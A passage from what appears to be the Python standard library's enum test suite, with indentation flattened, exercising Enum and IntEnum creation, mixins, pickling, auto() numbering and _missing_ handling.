e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class AlwaysEqual:
def __eq__(self, other):
return True
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(AlwaysEqual(), OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, AlwaysEqual())
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_missing_exceptions_reset(self):
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum creates a reference loop and thus
# Class2 instances will stick around until the next gargage collection
# cycle, unlike Class1.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
class StrEnum(str, Enum):
def __new__(cls, *args, **kwargs):
for a in args:
if not isinstance(a, str):
raise TypeError("Enumeration '%s' (%s) is not"
" a string" % (a, type(a).__name__))
return str.__new__(cls, *args, **kwargs)
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
